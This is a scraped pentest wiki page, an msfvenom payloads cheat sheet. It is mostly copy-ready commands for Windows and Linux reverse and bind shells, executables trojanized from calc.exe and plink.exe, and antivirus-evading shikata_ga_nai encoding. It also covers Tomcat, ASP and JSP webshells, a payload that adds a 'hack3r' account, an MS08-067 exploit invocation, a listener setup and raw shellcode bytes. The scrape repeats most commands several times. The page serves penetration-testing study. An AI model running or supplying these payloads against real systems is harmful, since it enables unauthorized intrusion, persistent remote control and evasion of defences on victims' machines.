created: 2022-04-19T19:52:39 (UTC +08:00)
tags: []
source: https://pentestwiki.org/msfvenom-payloads-cheat-sheet/
author:

✅ Msfvenom Payloads Cheat Sheet - pentestwiki.org

Excerpt

Extensive list with Metasploit MSFvenom payloads: reverse shells, trojanized exe files, webshells, obfuscated payloads, …


Extensive list of msfvenom payloads cheat sheet for Metasploit

General commands with Msfvenom


General commands with Msfvenom - 图1


List all payloads types (around 562 types):

  1. msfvenom -l payloads

Show only Windows x64 payloads:

msfvenom -l payloads —platform windows —arch x64

msfvenom -l payloads —platform windows —arch x64

  1. msfvenom -l payloads --platform windows --arch x64

Shows output formats (asp, exe, php, powershell, js_le, csharp, …):

  1. msfvenom --list formats

General commands with Msfvenom - 图2

Metasploit Msfvenom Basic Usage

Difference between staged and non-staged payloads

In msfvenom we can choose between staged and non-staged payloads, but what are they?

Non-staged payloads are standalone payloads, that means the whole payload is sent at once to the target. Advantage: Less communications so it is better to avoid detection.

Staged payloads are sent in two stages: The first one it loads a dropper, and the second stage it loads the payload. The advantages are: 1) If the buffer overflow it’s too small to hold a non-staged payload, split it in two will help. 2) Having several parts it is also better for host anti-virus detection.

Payloads generation with Msfvenom

Binary payloads

Generate C code for a Windows target with a TCP reverse shell connecting back to host $LOCALIP:443 (non-staged payload):

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c

Generate C code for a Windows target with a TCP reverse shell connecting back to host $LOCALIP:443 (staged payload):

msfvenom -p windows/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -f c

msfvenom -p windows/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -f c

  1. msfvenom -p windows/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -f c

Generate C code for TCP reverse shell to host $LOCALIP:443 obfuscating the payload and avoiding bad chars \x00\x0a\x0d in the shellcode:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c –e x86/shikata_ga_nai -b “\x00\x0a\x0d”

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c –e x86/shikata_ga_nai -b “\x00\x0a\x0d”

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f c e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Generate C code for reverse shell to host $LOCALIP:443 (TCP) obfuscating the payload and avoiding bad chars \x00\x0a\x0d in the shellcode and spawning the shellcode in a different threat to not crash the main process:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b “\x00\x0a\x0d”

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b “\x00\x0a\x0d”

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 EXITFUNC=thread -f c e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Generate C code for a bindshell for a Linux target on port TCP/4444 avoiding bad chars \x00\x0a\0d\x20 and obfuscating the shellcode:

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b “\x00\x0a\x0d\x20” –e x86/shikata_ga_nai

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b “\x00\x0a\x0d\x20” –e x86/shikata_ga_nai

  1. msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" e x86/shikata_ga_nai

Generate JavaScript payload to execute a staged reverse shell against host $LOCALIP on port 443:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f js_le -e generic/none

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f js_le -e generic/none

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f js_le -e generic/none

Generate a Windows EXE with a shellcode executing a reverse shell against host $LOCALIP on port 4444 (TCP). The output will be written in file shell_reverse.exe:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe

Generate a Windows EXE with a shellcode executing a reverse shell against host $LOCALIP on port 4444 (TCP). The output will be written in file shell_reverse_msf_encoded.exe. Obfuscate the shellcode doing 9 rounds of obfuscation.

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe

Trojanize file plink.exe to execute a reverse shell against host $LOCALIP:4444 (TCP) using 9 rounds of obfuscation and write the output EXE in file shell_reverse_msf_encoded_embedded.exe:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Generate an EXE file called met_https_reverse.exe to execute a reverse shell through https (port 443) on host $LOCALIP to connect to a listening meterpreter session:

msfvenom -p windows/meterpreter/reverse_https LHOST=$LOCALIP LPORT=443 -f exe -o met_https_reverse.exe

msfvenom -p windows/meterpreter/reverse_https LHOST=$LOCALIP LPORT=443 -f exe -o met_https_reverse.exe

  1. msfvenom -p windows/meterpreter/reverse_https LHOST=$LOCALIP LPORT=443 -f exe -o met_https_reverse.exe

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o shell_reverse.exe

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

msfvenom -p windows/meterpreter/reverse_http LHOST=$LOCALIP LPORT=80 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/plink.exe -o /var/www/daaa118.exe

msfvenom -p windows/meterpreter/reverse_http LHOST=$LOCALIP LPORT=80 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/plink.exe -o /var/www/daaa118.exe

  1. msfvenom -p windows/meterpreter/reverse_http LHOST=$LOCALIP LPORT=80 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/plink.exe -o /var/www/daaa118.exe

Trojanize calc.exe to execute a meterpreter reverse shell against host $LOCALIP saved in file calc_2.exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP -f exe -k -x calc.exe -o calc_2.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP -f exe -k -x calc.exe -o calc_2.exe

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP -f exe -k -x calc.exe -o calc_2.exe

Staged ELF shared library (.so) payload with a reverse shell:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o staged.out -f elf-so

msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o staged.out -f elf-so

  1. msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o staged.out -f elf-so

Non-staged ELF shared library (.so) payload with a reverse shell:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -o non-staged.out -f elf-so

msfvenom -p linux/x86/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -o non-staged.out -f elf-so

  1. msfvenom -p linux/x86/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -o non-staged.out -f elf-so

Generate file meterpreter.exe cointaining a reverse shell against host $LOCALIP on port TCP/443:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -o meterpreter.exe

Warning: When using -x parameter, the executable must not be UPX compressed

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -x /usr/share/windows-binaries/plink.exe -e x86/shikata_ga_nai -o plink-meterpreter.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -x /usr/share/windows-binaries/plink.exe -e x86/shikata_ga_nai -o plink-meterpreter.exe

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=443 -f exe -x /usr/share/windows-binaries/plink.exe -e x86/shikata_ga_nai -o plink-meterpreter.exe

Exploit MS08-067 (NetAPI vulnerability) on host $IP and execute a bindshell after exploitation:

msfcli windows/smb/ms08_067_netapi RHOST=$IP PAYLOAD=windows/shell/bind_tcp E

msfcli windows/smb/ms08_067_netapi RHOST=$IP PAYLOAD=windows/shell/bind_tcp E

  1. msfcli windows/smb/ms08_067_netapi RHOST=$IP PAYLOAD=windows/shell/bind_tcp E

Generate a python payload to execute calc.exe omitting characters \x00 (NULL byte):

msfvenom -p windows/exec CMD=calc.exe -b “x00” -f py

msfvenom -p windows/exec CMD=calc.exe -b “x00” -f py

  1. msfvenom -p windows/exec CMD=calc.exe -b "x00" -f py

Create account.exe file 20 rounds of obfuscation that contains a payload that will create the user hack3r with password s3cret^s3cret:

msfvenom -p windows/adduser -f exe -o account.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20

msfvenom -p windows/adduser -f exe -o account.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20

  1. msfvenom -p windows/adduser -f exe -o account.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20

Trojanized DLL calc.dll to execute calc.exe:

msfvenom -p windows/exec CMD=calc.exe -f dll -o calc.dll

msfvenom -p windows/exec CMD=calc.exe -f dll -o calc.dll

  1. msfvenom -p windows/exec CMD=calc.exe -f dll -o calc.dll

Trojanize Windows Service with 20 rounds of obfuscation to create a new user hack3r with password s3cret^s3cret:

msfvenom -p windows/exec CMD=calc.exe -f exe-service

msfvenom -p windows/adduser -f exe-service -o service.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20

msfvenom -p windows/exec CMD=calc.exe -f exe-service msfvenom -p windows/adduser -f exe-service -o service.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20

  1. msfvenom -p windows/exec CMD=calc.exe -f exe-service
  2. msfvenom -p windows/adduser -f exe-service -o service.exe USER=hack3r PASS=s3cret^s3cret -e x86/shikata_ga_nai -i 20

Get shellcode assembler code:

msfvenom -p linux/x86/exec cmd=whoami R | ndisasm -u -

msfvenom -p linux/x86/exec cmd=whoami R | ndisasm -u -

  1. msfvenom -p linux/x86/exec cmd=whoami R | ndisasm -u -
  1. Payload size: 42 bytes
  2. 00000000 6A0B push byte +0xb
  3. 00000002 58 pop eax
  4. 00000003 99 cdq
  5. 00000004 52 push edx
  6. 00000005 66682D63 push word 0x632d
  7. 00000009 89E7 mov edi,esp
  8. 0000000B 682F736800 push dword 0x68732f
  9. 00000010 682F62696E push dword 0x6e69622f
  10. 00000015 89E3 mov ebx,esp
  11. 00000017 52 push edx
  12. 00000018 E807000000 call 0x24
  13. 0000001D 7768 ja 0x87
  14. 0000001F 6F outsd
  15. 00000020 61 popa
  16. 00000021 6D insd
  17. 00000022 6900575389E1 imul eax,[eax],dword 0xe1895357
  18. 00000028 CD80 int 0x80

Get assembler in friendly format to embedded in a python/perl exploit:

msfvenom -p linux/x86/exec cmd=whoami R | hexdump -v -e ‘“\\x” 1/1 “%02x”‘

msfvenom -p linux/x86/exec cmd=whoami R | hexdump -v -e ‘“\\x” 1/1 “%02x”‘

  1. msfvenom -p linux/x86/exec cmd=whoami R | hexdump -v -e '"\\\x" 1/1 "%02x"'
  1. Payload size: 42 bytes
  2. \x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7
  3. \x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89
  4. \xe3\x52\xe8\x07\x00\x00\x00\x77\x68\x6f\x61
  5. \x6d\x69\x00\x57\x53\x89\xe1\xcd\x80

Webshells generation with Msfvenom

Tomcat webshell with a meterpreter reverse shell:

msfvenom -p java/meterpreter/reverse_tcp -f war -o tomcatapp.war LHOST=$LOCALIP

msfvenom -p java/meterpreter/reverse_tcp -f war -o tomcatapp.war LHOST=$LOCALIP

  1. msfvenom -p java/meterpreter/reverse_tcp -f war -o tomcatapp.war LHOST=$LOCALIP

Tomcat webshell with a standalone reverse shell against host $LOCALIP on port 442:

msfvenom -p java/shell_reverse_tcp -f war -o tomcatapp2.war LHOST=$LOCALIP LPORT=442

msfvenom -p java/shell_reverse_tcp -f war -o tomcatapp2.war LHOST=$LOCALIP LPORT=442

  1. msfvenom -p java/shell_reverse_tcp -f war -o tomcatapp2.war LHOST=$LOCALIP LPORT=442

ASP webshell on Windows:

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f asp -o webshell_reverse_msfvenom.txt

msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f asp -o webshell_reverse_msfvenom.txt

  1. msfvenom -p windows/shell_reverse_tcp LHOST=$LOCALIP LPORT=443 -f asp -o webshell_reverse_msfvenom.txt

JSP webshell on Linux:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o test.jsp -f jsp

msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o test.jsp -f jsp

  1. msfvenom -p linux/x86/shell/reverse_tcp LHOST=$LOCALIP LPORT=443 -o test.jsp -f jsp

-v payload: specifies the payload name!! Very useful when replacing existing payloads in existent exploits

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 443 set LHOST $LOCALIP exploit

  1. use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_tcp
  3. set LPORT 443
  4. set LHOST $LOCALIP
  5. exploit

More info: